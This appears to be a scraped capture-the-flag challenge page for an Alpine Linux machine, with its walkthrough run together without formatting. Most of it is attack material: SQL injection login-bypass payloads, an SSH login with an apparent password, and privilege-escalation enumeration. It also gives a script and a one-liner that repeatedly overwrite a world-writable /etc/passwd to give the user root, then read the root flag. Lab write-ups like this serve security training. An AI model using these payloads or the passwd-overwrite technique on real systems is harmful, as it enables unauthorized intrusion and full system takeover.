🏔️ This Alpine Linux system appears well-secured with multiple defensive layers protecting two valuable flags. 🔐
💻 A web application guards the entrance, while deeper system protections await those who can navigate past the initial barriers.
⚡ Can you find the path through the security measures and claim both treasures? 🎯
Launch your dedicated AWS machine to begin hacking
' OR 1=1-- ' OR '1'='1 to avoid comment characters entirelyadmin' OR '1'='1 as username with any password' OR 1=1 OR 'x'='x (also works without comments)ssh ctf@<target-ip>nVqax6z9hjYesbGAQlSceueZPO2gh5a8t5XUYGQbTz8LmaWgwmcat ~/flag-user.txtls -la /etc/passwd
id
sudo -l
find / -perm -4000 2>/dev/null/etc/passwd is world-writable (666 permissions)ps aux | grep setup
cat /root/setup.sh 2>/dev/null || echo "Cannot read setup.sh"# Create the privilege escalation script
cat << 'EOF' > /tmp/privesc.sh
#!/bin/sh
echo "[*] Starting automated privilege escalation..."
echo "[+] Creating modified passwd file..."
# Create the modified passwd file once
cp /etc/passwd /tmp/passwd.tmp 2>/dev/null
sed 's/ctf:x:1000:1000:/ctf:x:0:0:/' /tmp/passwd.tmp > /tmp/passwd.new 2>/dev/null
rm -f /tmp/passwd.tmp
if [ ! -f /tmp/passwd.new ]; then
echo "[-] Failed to create modified passwd file"
exit 1
fi
echo "[+] Modified passwd file created. Starting continuous overwrite loop..."
echo "[+] UID will be changed to 0 (root). Use 'su ctf' to escalate."
# Continuously overwrite /etc/passwd with our modified version
while true; do
cat /tmp/passwd.new > /etc/passwd 2>/dev/null
sleep 1
done
EOFchmod +x /tmp/privesc.sh
/tmp/privesc.sh &# Wait for success message, then escalate
su ctf
# You should now have root privileges# Continuous exploitation loop using cat redirection
while true; do cp /etc/passwd /tmp/p.tmp 2>/dev/null && sed 's/ctf:x:1000:1000:/ctf:x:0:0:/' /tmp/p.tmp > /tmp/p.new 2>/dev/null && cat /tmp/p.new > /etc/passwd 2>/dev/null && rm -f /tmp/p.tmp /tmp/p.new && echo "[+] Exploit successful! Use 'su ctf' to escalate."; sleep 0.1; done &cat /root/flag-root.txtid
whoami
ls -la /root/admin' OR '1'='1admin' OR 'a'='a' OR 1=1 OR 'x'='x' OR 1=1 LIMIT 1 OFFSET 0 OR '1'='1Enter your email to continue
Choose a username to get started
We've sent a 9-character code to your email